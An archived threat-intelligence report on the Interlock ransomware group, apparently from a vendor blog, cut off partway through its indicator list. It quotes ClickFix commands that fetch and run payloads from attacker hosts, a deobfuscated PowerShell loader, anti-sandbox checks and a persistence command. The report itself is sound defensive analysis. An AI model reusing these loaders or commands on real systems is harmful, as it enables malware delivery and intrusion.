{ "id": "de2f8752-86c8-4c9c-97e7-301d68fe7307", "created_at": "2026-04-06T00:18:12.383554Z", "updated_at": "2026-04-10T03:30:50.46505Z", "deleted_at": null, "sha1_hash": "b139c9201b7bf2c2aec96a7660254f37e035ae9a", "title": "Interlock ransomware evolving under the radar", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1090933, "plain_text": "Interlock ransomware evolving under the radar\r\nBy Sekoia TDR\r\nPublished: 2025-04-16 · Archived: 2026-04-05 14:22:50 UTC\r\nIntroduction\r\nInterlock is a ransomware intrusion set first observed in September 2024 that conducts Big Game Hunting and\r\ndouble extortion campaigns. Interlock cannot be classified as a “Ransomware-as-a-Service” (RaaS) group, as no\r\nadvertisements for recruiting affiliates or information about affiliates have been found as of March 2025. As many\r\nother ransomware groups, Interlock has a Data Leak Site (DLS) called “Worldwide Secrets Blog” exposing\r\nvictim’s data, and providing a way to negotiate the ransom price to the victims. \r\nAlthough Interlock operators continue to regularly claim new victims on their DLS, they have published fewer\r\nnames —  24 victims since September 2024, including 6 in 2025 —  compared to the most active ransomware\r\ngroups currently operating. Indeed, ransomware such as Clop, RansomHub, Akira, Babuk, Lynx, Qilin, and Fog,\r\neach claimed more than one hundred victims in the first quarter of 2025. The companies impacted by the Interlock\r\nransomware span various sectors across North America and Europe, indicating that the target selection is primarily\r\nopportunistic.\r\nInterlock employs a multi-stage attack chain, starting by compromising legitimate websites that deliver fake\r\nbrowser updates, such as Google Chrome or MS Edge installers. These fake installers execute a PowerShell\r\nbackdoor facilitating the execution of multiple tools, and ultimately leading to the ransomware payload delivery.\r\nSince the apparition of the Interlock ransomware, Sekoia Threat Detection \u0026 Research (TDR) team observed its\r\noperators evolving, improving their toolset, and leveraging new techniques such as ClickFix to deploy the\r\nransomware payload. They also used new tools such as LummaStealer and BerserkStealer. This report describes\r\nthe malware and techniques used by Interlock operators and updates the knowledge of this threat following the\r\nTalos report in November 2024.\r\nFake updaters for initial access\r\nSince the emergence of the Interlock ransomware, its operators were observed using fake updaters hosted on\r\ncompromised websites to deceive victims into downloading and executing the payload themselves. These\r\ninstallers are, in fact, PyInstaller files designed to mislead users. When the fake updater is manually launched by\r\nthe victim, it downloads and executes a legitimate installer file according to the masqueraded product (a legitimate\r\nGoogle Chrome installer or MS Edge installer), while also running an embedded PowerShell script, which\r\nfunctions as a simple first-stage backdoor. \r\nThis PowerShell script operates in an infinite loop, continuously executing HTTP requests to specified hosts, with\r\na failover logic between domain names and IP addresses in case of errors. It gathers system information,\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 1 of 24\n\ncommunicates with remote hosts, downloads and executes files, and, in recent versions, offers functionality for\r\nexecuting arbitrary commands and establishing persistence.\r\nAt the launch, the script verifies whether it has been executed with specific arguments. If only a single argument is\r\nprovided, it relaunches itself with an additional argument ‘1’ to ensure the script runs in a detached mode without\r\na visible window.\r\nThe system information is collected using various PowerShell commands. The following information are\r\ncollected:\r\nThe version of the script which is written in a constant;\r\nUser context (SYSTEM, Admin or User privileges) by using \r\n[Security.Principal.WindowsIdentity]::GetCurrent();\r\nSystem information via systeminfo;\r\nProcesses and services via tasklist /svc;\r\nActive services via Get-Service;\r\nAvailable drives via Get-PSDrive;\r\nARP table via arp -a.\r\nAfter collecting system information, the script applies an XOR operation to the data using a hardcoded key, then\r\ncompresses it with the Gzip algorithm and prefixes the final buffer with a fixed 32b integer.\r\nThe formatted system information is sent to the Command-and-Control (C2) server using an HTTP POST request\r\non the /init1234 URL path. Then the server can respond “ooff” which is a terminate command.\r\nThe C2 server can also send a .exe or .dll file (the type is determined by the last byte of the response). The file is\r\ndecoded using XOR and saved in a randomly named folder within %AppData%. It is then executed directly in the\r\ncase of a .exe file or via rundll32 in the case of a .dll. Unfortunately, the TDR team was not able to retrieve the\r\npayload returned by the C2 server, but multiple files corresponding to the expected response were observed. These\r\nfiles are described further below.\r\nMultiple versions of this PowerShell RAT were observed from version 1 to version 11. Later versions of the script\r\nimplements a atst command to establish persistence by creating a\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key to relaunch itself at startup. This version\r\n(V11) is also able to get and execute a Windows command from the C2.\r\nIn one of the last observed PowerShell backdoor, the requested domains are the following:\r\nsublime-forecasts-pale-scored.trycloudflare[.]com\r\nwashing-cartridges-watts-flags.trycloudflare[.]com\r\ninvestigators-boxing-trademark-threatened.trycloudflare[.]com\r\nfotos-phillips-princess-baker.trycloudflare[.]com\r\ncasting-advisors-older-invitations.trycloudflare[.]com\r\ncomplement-parliamentary-chairs-hc.trycloudflare[.]com\r\nC2 domains used by the PowerShell backdoor v7-v9\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 2 of 24\n\nAll observed domains are subdomains from trycloudflare.com, a legitimate Cloudflare service. TryCloudflare\r\nenables the creation of tunnels to test applications locally without permanently exposing them to the Internet. By\r\nquerying trycloudflare.com domains for a response on the /init1234 path, multiple other domains used in similar\r\ncases were identified.\r\nThe PowerShell script used the following IP addresses as backup solution:\r\n216.245.184[.]181 AS399629 (BLNWX)\r\n212.237.217[.]182 AS57043 (Hostkey B.v.)\r\n168.119.96[.]41 AS24940 (Hetzner Online GmbH)\r\nBackup IP addresses used by the PowerShell backdoor v7-v9\r\nIn all observed samples, the PowerShell backdoor has hard-coded backup IP addresses. Eight different clusters of\r\nIP addresses were used to observe the beginning of Interlock’s activity. The domains and IP addresses discovered\r\nduring the investigation are listed in the Indicators section.\r\nThe composition of these clusters is noteworthy. In nearly every cluster, one of these IP addresses is from the\r\nBLNWX AS (BitLaunch), a VPS provider allowing to pay with cryptocurrencies, another one from the AS\r\nHetzner Online GmbH, and the third one originates from a different AS each time. This distribution of IP address\r\norigin can be an effort to make the C2 infrastructure more resilient to takedown.\r\nIn January 2025, the Sekoia TDR team observed a change in Interlock fake updater. It shifted from a browser fake\r\nupdater to an updater referring to security software, with file names such as:\r\nFortiClient.exe\r\nIvanti-Secure-Access-Client.exe\r\nGlobalProtect.exe\r\nWebex.exe\r\nAnyConnectVPN.exe\r\nCisco-Secure-Client.exe\r\nzyzoom_antimalware.exe\r\nThis new fake updater uses PyInstaller and drops the DLL python313.dll to execute itself. It end up executing the\r\nsame PowerShell backdoor.\r\nAdoption of the ClickFix technique for initial access\r\nOn 9 January, 2025, TDR observed a ClickFix killchain delivering a fake installer payload, which was associated\r\nwith Interlock. ClickFix is a social engineering technique where threat actors manipulate users into executing\r\nmalicious commands by presenting fake system prompts or CAPTCHA verifications. These prompts guide victims\r\nto manually copy and paste malicious PowerShell commands, bypassing automated security measures and leading\r\nto malware deployment or system compromise.\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 3 of 24\n\nFigure 1. Fake Cloudflare CAPTCHA asking users to execute a command to access a website\r\nThis specific ClickFix page was observed on four different URLs, but only the one masquerading Advanced\r\nIPScanner seems to deliver a fake installer, the others executing the PowerShell backdoor via an obfuscated\r\nloader.\r\nhttps://microsoft-msteams[.]com/additional-check.html\r\nhttps://microstteams[.]com/additional-check.html\r\nhttps://ecologilives[.]com/additional-check.html\r\nhttps://advanceipscaner[.]com/additional-check.html\r\nThe website asks the user to open a console by using the shortcut “Windows + R” and to paste the command by\r\nusing CTRL + V that was silently copied into the victim clipboard. Then the victim is guided to press “Enter” to\r\nexecute the command.\r\nCase 1 — PyInstaller ⇒ PowerShell backdoor\r\nWhen the “Fix it” button is clicked, the clipboard is filed with the following command:\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 4 of 24\n\ncmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command \"$path='c:\\\\users\\\\public\\\\win31.exe';iwr\r\nThis command downloads the payload from hxxp://topsportracing[.]com/wp-25 URL, which seems to be a\r\ncompromised website, and opens a browser window to the legitimate website https://www.advanced-ip-scanner.com/ to make the user believe that the command allowed it to access the AdvanceIPScanner website and\r\nnot arouse any suspicions.\r\nThe downloaded payload is a 36 MB PyInstaller file, which is a sample of the fake updater described above.\r\nCase 2 — Obfuscated PowerShell loader ⇒ PowerShell backdoor\r\nThe command is an obfuscated PowerShell loader which downloads a legitimate Node.js executable from\r\nhttps://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip and executes the PowerShell backdoor which is double\r\nbase64 encoded. This legitimate executable will be used to execute the malicious payload.\r\ncmd /c start /min powershell -w H -c \"$response = Invoke-WebRequest -Uri \\\"64.95.10[.]95:8080/misteams\\\" ; Invo\r\nA deobfuscated version of this loader could be the following: \r\n$legitimate_nodejs_url = \"https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip\"\r\n$appdata_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\"\r\n$download_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\downloaded.zip\"\r\ntry {\r\n$web_client = New-Object System.Net.WebClient\r\n$web_client.DownloadFile($legitimate_nodejs_url, $download_path)\r\n} catch {\r\nexit 1\r\n}\r\nif (-not (Test-Path -Path $appdata_path)) {\r\nni -Path $appdata_path -ItemType Directory | Out-Null\r\n}\r\ntry {\r\n$shell_app = New-Object -ComObject Shell.Application\r\n$namespace_download = $shell_app.NameSpace($download_path)\r\n$namespace_appdata = $shell_app.NameSpace($appdata_path)\r\n$namespace_appdata.CopyHere($namespace_download.Items(), 4 + 16)\r\n} catch {\r\nexit 1\r\n}\r\n$appdata_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\"\r\n$alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\r\n$random_str = -join ((1..8) | % { $alphabet[(Get-Random -Minimum 0 -Maximum $alphabet.Length)] })\r\n$log_file_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\\\u003crandom_str\u003e.log\"\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 5 of 24\n\n$b64_payload = \"\u003cbase64 encoded payload\u003e\"\r\n$payload = [Convert]::FromBase64String($b64_payload)\r\n[System.IO.File]::WriteAllBytes($log_file_path, $payload)\r\n$nodejs_exe_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\\node.exe\"\r\nsaps -FilePath $ExecutionContext.InvokeCommand.$nodejs_exe_path -ArgumentList $ExecutionContext.InvokeCommand.$l\r\nIn February 2025, this loader was improved with some interesting execution guardrails:\r\nThe system manufacturer is not “QEMU”;\r\nThe total physical memory is at least 4 GB or the used physical memory is at least 1.5 GB;\r\nThe computer name is not “DESKTOP-\\S”;\r\n$manufacturer = gwmi Win32_ComputerSystem | select -ExpandProperty Manufacturer\r\nif ($manufacturer -eq \"QEMU\") {\r\nexit 0;\r\n}\r\n$total_physical_memory = (Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB\r\n$free_physical_memory = (Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB\r\n$used_physical_memory = $total_physical_memory - $free_physical_memory\r\nif ($total_physical_memory -lt 4 -or $used_physical_memory -lt 1.5) {\r\nexit 0\r\n}\r\nif ($env:computername -match \"DESKTOP-\\S\") {\r\nexit 0\r\n}\r\nThese execution guardrails are anti sandbox condition, as QEMU is widely used in malware analysis and sandbox\r\nenvironments. Checking the memory size is a common method for VM detection, as sandboxes are often created\r\nwith the minimum possible amount of resources.\r\nTDR continues to watch closely this ClickFix infrastructure. However, it seems to be unused since February 2025.\r\nIt is possible that this technique was less effective than the Interlock operators had anticipated, leading them to\r\nabandon its use.\r\nDelivered payload\r\nSekoia TDR team did not observe the PowerShell backdoor downloading or executing any payload, most of the\r\nongoing C2 server responding ooff during our investigation which is the PowerShell backdoor’s shutdown\r\ncommand. According to the first analysis conducted by CISCO Talos in November 2024, the observed delivered\r\npayloads are a credential stealer and a keylogger. This is coherent with the files related to Interlock activity\r\nobserved ever since. \r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 6 of 24\n\nThe custom packer used by Interlock intrusion set to protect all files related to their attacks allowed TDR to pivot\r\nand track their different tools. The executables packed in this custom packer were indeed files related to\r\nkeylogging activity and information stealer.\r\nTDR also observed the Interlock operators using different known families of credential stealers, such as\r\nLummaStealer in February 2025 and BerserkStealer in January 2025. All these malware families were packed\r\nusing the Interlock custom packer.\r\nAs for the ClickFix technique, the observed usage of these two malware families is limited in time, which possibly\r\nindicates that the Interlock operators are testing and/or deploying new tools.\r\nHowever, the most frequently observed file during our investigation is the Interlock RAT described in the\r\nfollowing section.\r\nInterlock RAT\r\nIn the payloads related to Interlock activity, TDR observed a backdoor used by Interlock since at least October\r\n2024. This malware is a RAT that is a packed DLL of ~1.3 MB, while its unpacked version is only ~180 KB.\r\nThis RAT implements the following commands: \r\n1 Ping back and re-create socket\r\n2 Read data from TCP connection\r\n3 Download a file from the C2 and save it on the disk\r\n4 Do nothing\r\n5\r\nRun rundll32.exe %temp%\\tmp[random int].dll run %temp%\\tmp[random int].dll and exit.\r\nThe executed DLL file is an embedded DLL used to remove itself.\r\n6\r\nWrite log file in %temp%\\[random int].log (which seems to be a config file containing the\r\nC2 IP addresses)\r\n7 Update the C2 list\r\n8 Close each connection and each opened file\r\n9 Execute a cmd.exe\r\n30/06/2025 Update: Following feedback from an external reviewer, it was brought to our attention that our initi\r\nAdditional information:\r\n - The command 3 uses WriteFile not to download files, but to redirect the created pipe in order to weaponize it\r\n - The command 5 execute an embedded DLL to removed itself from the victim machine and consequently remain steal\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 7 of 24\n\nThis RAT has three hard-coded IP addresses, which correspond to the observed clusters, and the malware\r\ncommunicates with its C2 with a raw TCP socket on port 443. The data downloaded from the C2 servers is\r\ndecrypted using a custom XOR-based function.\r\nThe backdoor sends to the C2 server the following information preceded by a magic number 55 11 69 DF\r\n(0xDF691155).\r\n{\"iptarget\": \"96.62.214[.]11\", \"domain\": \"WORKGROUP\", \"pcname\": \"SIRIUSWIN11MRE\", \"runas\": 1, \"typef\": 2, \"vero\r\niptarget: C2 IP address;\r\nrunas: boolean indicating if the sample is executed with admin privileges or not;\r\ntypedef: hardcoded value;\r\nveros: OS version of the infected system;\r\ndomain: the Active Directory domain to which the host is connected, or “WORKGROUP” if not present.\r\nLateral movement and exfiltration\r\nAccording to Talos Incident Response, the Interlock operators primarily use RDP and stolen credentials to move\r\nbetween systems. Additionally, they observed commands used for pre-kerberoasting reconnaissance. Like many\r\nother ransomware groups, they aim to gain access to the victim’s domain controller (DC). Domain controllers are\r\ncritical because they host Active Directory Domain Services (AD DS), which manage authentication,\r\nauthorisation, and resource access across the network. By compromising the domain controller, attackers gain\r\ncontrol over the entire domain, allowing them to escalate privileges, disable security mechanisms, and propagate\r\ntheir ransomware payload across all connected systems.\r\nThe operators also use PuTTY, AnyDesk and possibly LogMeIn to maintain remote access. PuTTY is likely used\r\nto access Linux systems, as Interlock ransomware has a version able to target them..\r\nFurthermore, Talos reports that Interlock operators use Azure Storage Explorer and the AZCopy tool to exfiltrate\r\nsensitive data to an attacker-controlled Azure storage blob. This information could not be confirmed by our\r\nobservations.\r\nWhen the Interlock operators succeed in exfiltrating the sensitive data from a company’s network, they upload it\r\non a new TOR domain. The link to this TOR domain is provided in each post dedicated to a new victim on their\r\nDLS.\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 8 of 24\n\nFigure 2. Screenshot of Interlock’s DLS\r\nThe Interlock ransomware exists in multiple versions, with variants compiled to target both Windows and Linux\r\nOperating System. Since November 2024, multiple Windows variants have been identified, although no Linux\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 9 of 24\n\nvariant has been observed since October 2024. The Linux version of the ransomware closely mirrors the Windows\r\none, with the same expected arguments.\r\nAs for other malware used in Interlock attacks, the Windows version of the ransomware is also developed in\r\nC/C++. The executable is protected by a custom packer and unpacked using a code stored in its Thread Local\r\nStorage. The Windows variant uses AES CBC encryption provided by the LibTomCrypt library. After the\r\nunpacking phase, it enumerates logical drives from the letter A to Z (excluding the C drive), then it iterates over\r\nfolders and files in these drives, encrypting files with specific extensions while excluding folders like\r\n$Recycle.Bin, PerfLogs, and system-critical files such as .dll or .exe. The names of encrypted files are modified\r\nwith the extension .interlock used in the earlier version, and .!NT3R10CK in the more recent samples observed.\r\nAfter encryption, the ransomware creates a ransom note file in each folder. The file name evolves over time,\r\nstarting from !__README__!.txt to FIRST_READ_ME.txt and _QUICK_GUIDE_.txt .\r\nThe Windows variant of the ransomware creates a scheduled task to be executed every day at 8:00 PM. \r\nschtasks /create /sc DAILY /tn \"TaskSystem\" /tr \"cmd /C cd %s \u0026\u0026 %s\" /st 20:00 /ru system \u003e nul\r\nThe Windows variants have the following commands:\r\n-d –directory: target only the directory passed in argument\r\n-f –file: target only the file passed in argument\r\n-del –delete: the ransomware deletes itself after encryption. To do so, it drops a small DLL file (2.5 KB)\r\nstored in its data section and executes it using rundll32.exe. \r\n-s –system: create a scheduled task\r\n–release-files: unknown utility\r\nSince October 2024, the file extensions to be ignored by the ransomware have remained unchanged.\r\nWindows variant Linux variant\r\n.bat .ico .b00\r\n.bin .msi .v00\r\n.cab .ocx .v01\r\n.cmd .psm1 .v02\r\n.com .src .v03\r\n.cur .sys .v04\r\n.diagcab .ini .v05\r\n.diagcfg .url .v06\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 10 of 24\n\n.diagpkg .dll .v07\r\n.drv .exe .t00\r\n.hlp .ps1\r\n.hta\r\nRansom note\r\nThe ransom note has evolved slightly since the beginning of Interlock’s activity. Talos observed a similarity\r\nbetween the note dropped by Interlock ransomware and the one dropped by Rhysida ransomware, but could not\r\nconclude of a link between these two actors. TDR notes that the group is placing increasing emphasis on the legal\r\nrisks faced by companies, citing the laws that would be violated if the data leak were to be disclosed by Interlock.\r\nTwo different versions of the ransom note, observed on 11 October 2024 and 21 February 2025 are provided in the\r\nAppendix.\r\nConclusion\r\nThe Interlock ransomware group, active since September 2024, is an evolving, increasingly significant threat,\r\nalthough not a particularly prolific one at present. Despite its relatively low victim count in Q1 2025, the group\r\nhas demonstrated adaptability and innovation in its tactics. In January and February 2025, Interlock experimented\r\nwith a new initial access method, dubbed ClickFix, showcasing its willingness to innovate. Its reliance on\r\ncredential-stealing malware such as LummaStealer and Berserk Stealer, alongside keyloggers, underscores a\r\npersistent focus on harvesting sensitive data for lateral movement and privilege escalation.\r\nInterlock’s technical arsenal has remained largely consistent since its inception, relying on a specific PowerShell\r\nbackdoor, a Remote Access Trojan and ransomware payload. However, incremental enhancements to its toolset\r\nhave been observed, including the evolution of its PowerShell backdoor to version 11 and modifications to its\r\nransom note, which now emphasises legal repercussions for non-payment. \r\nInterlock continued to improve their tools and methods, which reflects a willingness to maintain relevance while\r\navoiding the large-scale visibility associated with more prolific ransomware groups such as the attention-seeker\r\nFunkSec ransomware group. TDR continues monitoring Interlock activities to anticipate further evolution and\r\npotential escalation in their campaigns.\r\nIndicators of Compromise and technical details\r\nIndicators of Compromise\r\nHost\r\nFake Updater\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 11 of 24\n\n576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296\r\nf962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c\r\n09793a85d372f044fe53c4b47c47049c6bc13d1141334727800b2e32e6d92342\r\ndee5915b76dd3bae3d3cedc0c1d1b055daab5852cba4868c92eb88b9a84a0b00\r\n5627457a12c562b7a08f634878758d268b9fde44ce35292e887ca13741c5f942\r\n3a560ca66f61ba5dceb6016703e0346ff8fe1144bd356a40f740149a2a878fe5\r\nf6c7ecff7b07cba12bd79833a23d12d5fcd12a75a3394d923b994ba0ed535db3\r\n7890b116d13a52efe696ce1e2c0ed83029775cf4bea836ce551e71d222ee116f\r\ne668e30b4e111e16b4017cd49dd90c39f9988f8a44cd9cc16b95b7b451862b74\r\nbe6e5cede4e6a8b807062db211eb3e8825a6cc00d71ddf7bcd63971d76219a25\r\n05c99f2c1a218ce4a985fd03a3a510c2eaf08ef4772f93ef4f2d5da6cd9b86a1\r\n25a1d86248b7cf5f870dbc9960ce336266473bd40be3a8dcb35e6be88c9df261\r\n2f03b5d1081dfde3d1296dace404b362188b4a941530746d7b14711b42bc53ad\r\nb36c20c757c4780f89272ce224a29a5a61b62733367893574196debde19383fe\r\nd1cd8c4574c3290ae16bf4e718c5e89dadef5b2fd4eea2211a19a6180ff8ee5b\r\neaca86a3f397d10d9188be9fcd2af1a7a30a9b573b2282b0b8300efeb5ff1efd\r\nf1df43fe0f95de6badfb710827cdc7272e6654f108ef2cfcb2a01aca089f0624\r\nClickFix PowerShell Loaders\r\n5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e\r\neb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34\r\n958ff93e92ee8bed7819555603ea612f263c1b9c673566f5c506288b5318eff8\r\n91fcf70c1775dcaaaa4d3de17d87d67976b0cec9939dedfb86f093ab388ed3b0\r\ne69491a61ebc4a9ffc17884063c69a5489a83dd6d71295b4216962a43242a6c8\r\n04bae0045b86456d6000378a2e37d58b1fa617101543ad23bcec862300b87be3\r\n71f773b4e9178dcedd402c94fb9384aea6312d8a93f95f3f9dc1249fd4933658\r\n888842bc1f6fcb354431919080858c623def305bed2214f11b93591859d4dee2\r\n045c041354a6d6b47e91e1124a7dc77397c18e0695ccbc73f87b12a0a1079d46\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 12 of 24\n\n6e4ca569ab809ba3545860d26180316366803c231a2e3a66b4906adc5826a397\r\n074d26b9b128be8e4a77d73dcac31307f28b0e8b8097622c02267be349fe4b4f\r\na760e28145620fccd072a415031cec4036fc09e8530c93d85f5d1509d62fe551\r\n62971070d6a8b9fca8a50b9cd8e91545bfcc2c2b6665f134c112081f54e6bf31\r\n17db9d121fb3eb5033307fdb53df67402bcbc9d8970f45d8142b78c83769b7af\r\n60af8899b49013e9deb1d5cac58562d7ed12bfda1187627e9d25714b26218f0d\r\nfdd4e0bb2a4475e4e44154d7bf29490de98496553af3c8807f999ab8b920263f\r\n7d9f3701bf6f43ab84ce02ce4915dc0703504263db2e1eb65f4f7c791565f731\r\nf613966b6ed1f080aacba005b1e48268ef662fffdf9894382299645f42900848\r\ne307d3e9b8de59311c692b2ab0ee864f0d469066e041141d577b65b43a4b3ffa\r\n351b8a0081fd9f5c35497f5183fb14aef73c1af75628ae689c9218689db01cd9\r\n7501623230eef2f6125dcf5b5d867991bdf333d878706d77c1690b632195c3ff\r\n31f49c74046cc61bf102f3b9f2ce06471b0372d794139325e71c2dacca7bd00a\r\nInterlock RAT\r\n1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83\r\n299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2\r\n2faef6a1a0c00f8d44955c243df3c098f0fccd20c59677d274a43023002a4e90\r\n39539766ae8f5256e6f21d853b8b7ea8f003d29f6d7cd57d1ecb621dc2b97c89\r\n464ca510a465a38689bd61988b7d366a8fd7e26ca805850b3adb418e95307601\r\n61f8224108602eb1f74cb525731c9937c2ffd9a7654cb0257624507c0fdb5610\r\n68366ced818508de187167d8f9106be7801b8dcf1f03ae169459c7336d6e69de\r\n8251186b3196e3fefb0dbfcf71dfccc2c1cd66515686c9af8a6fb48766c739c6\r\n9031652af104aa207d6dad1c402db86c557323b2567c0cc93d022f01ae926e9a\r\n9e387f1564f9e38ba87dbafbde3731db2e844ff3800500d6707028bb065c070b\r\nb3a512b9f4705d1947fbbbc42accdbd6bd95af1b07cec09d75af501746fecdd5\r\nf02622129e7774b7673e2a9f62bb4a208d4a142b5d925532c7920481549bd07b\r\n61d092e5c7c8200377a8bd9c10288c2766186a11153dcaa04ae9d1200db7b1c5\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 13 of 24\n\nb35da0c1a515286a2b3021cf518140a59a63b470a9d611303304918be9354d68\r\nKeylogger\r\n5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8\r\ndf41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782\r\nd4f3d0446e08dbf1a7ccb6da09e756ff75eae3b04dafe2c2a69d6919052d2ebf\r\nBerserkStealer\r\neb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692\r\na5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf\r\nLummaStealer\r\n4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e\r\nWindows Interlock ransomware\r\n4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9\r\n33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9\r\nb85586f95412bc69f3dceb0539f27c79c74e318b249554f0eace45f3f073c039\r\na26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642\r\n0fff8fb05cee8dc4a4f7a8f23fa2d67571f360a3025b6d515f9ef37dfdb4e2ea\r\nSmall autoremove DLL used by the ransomware\r\nc9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f\r\nLinux Interlock ransomware\r\n28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f\r\nNetwork\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 14 of 24\n\nData Leak Site \r\nhttp://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion\r\nBackdoor C2\r\nCluster 1\r\n23.95.182[.]59\r\n195.201.21[.]34\r\n159.223.46[.]184\r\nCluster 2\r\n23.227.203[.]162\r\n65.109.226[.]176\r\n65.38.120[.]47\r\nCluster 3\r\n216.245.184[.]181\r\n212.237.217[.]182\r\n168.119.96[.]41\r\nCluster 4\r\n216.245.184[.]170\r\n65.108.80[.]58\r\n84.200.24[.]41\r\nCluster 5\r\n206.206.123[.]65\r\n49.12.102[.]206\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 15 of 24\n\n193.149.180[.]158\r\nCluster 6\r\n85.239.52[.]252\r\n5.252.177[.]228\r\n80.87.206[.]189\r\nCluster 7\r\n65.108.80[.]58\r\n212.104.133[.]72\r\n140.82.14[.]117\r\nCluster 8\r\n64.94.84[.]85\r\n49.12.69[.]80\r\n96.62.214[.]11\r\nCluster 9\r\n177.136.225[.]153\r\n188.34.195[.]44\r\n45.61.136[.]202\r\nCompromised URLs\r\nhttp://topsportracing[.]com/wp-az\r\nhttp://topsportracing[.]com/az10\r\nhttps://airbluefootgear[.]com/wp-includes/images/xits.php\r\nhttps://apple-online[.]shop/ChromeSetup.exe https://apple-online[.]shop/MSTeamsSetup.exe\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 16 of 24\n\nhttps://apple-online[.]shop/MicrosoftEdgeSetup.exe\r\nClickFix URLs\r\nhttps://microsoft-msteams[.]com/additional-check.html\r\nhttps://microstteams[.]com/additional-check.html\r\nhttps://advanceipscaner[.]com/additional-check.html\r\nhttps://ecologilives[.]com/additional-check.html\r\nhttp://162.55.47[.]21:8080/1742688720\r\nhttp://64.95.10[.]95:8080/misteams\r\nhttp://64.95.10[.]95:8080/recaptch\r\nhttp://45.61.136[.]228:8080/recaptha\r\nhttps://album-anthony-rn-submission[.]trycloudflare.com/25423565\r\nhttps://spa-step-hopkins-islands[.]trycloudflare.com/erfgtrtt\r\nhttps://metro-offset-imposed-behind[.]trycloudflare.com/ytjstast\r\nhttps://santa-reflection-capitol-classifieds[.]trycloudflare.com/12341234\r\nhttps://diff-beats-belize-chapter[.]trycloudflare.com/12341234\r\nhttps://phones-pichunter-businesses-drop[.]trycloudflare.com/12341234\r\nhttps://lcd-add-palace-switching[.]trycloudflare.com/12341234\r\nhttps://forest-offensive-height-letters[.]trycloudflare.com/12341234\r\nhttps://pub-motorola-viking-charger[.]trycloudflare.com/12341234\r\nhttps://dc-broader-green-norwegian[.]trycloudflare.com/12341234\r\nPowerShell backdoor C2 domains\r\nrefrigerator-cheers-indicator-ferrari[.]trycloudflare.com\r\nanalytical-russell-cincinnati-settings[.]trycloudflare.com\r\nbristol-weed-martin-know[.]trycloudflare.com\r\nspeak-head-somebody-stays[.]trycloudflare.com\r\nphoto-auction-visual-gains[.]trycloudflare.com\r\nsuffering-arnold-satisfaction-prior[.]trycloudflare.com\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 17 of 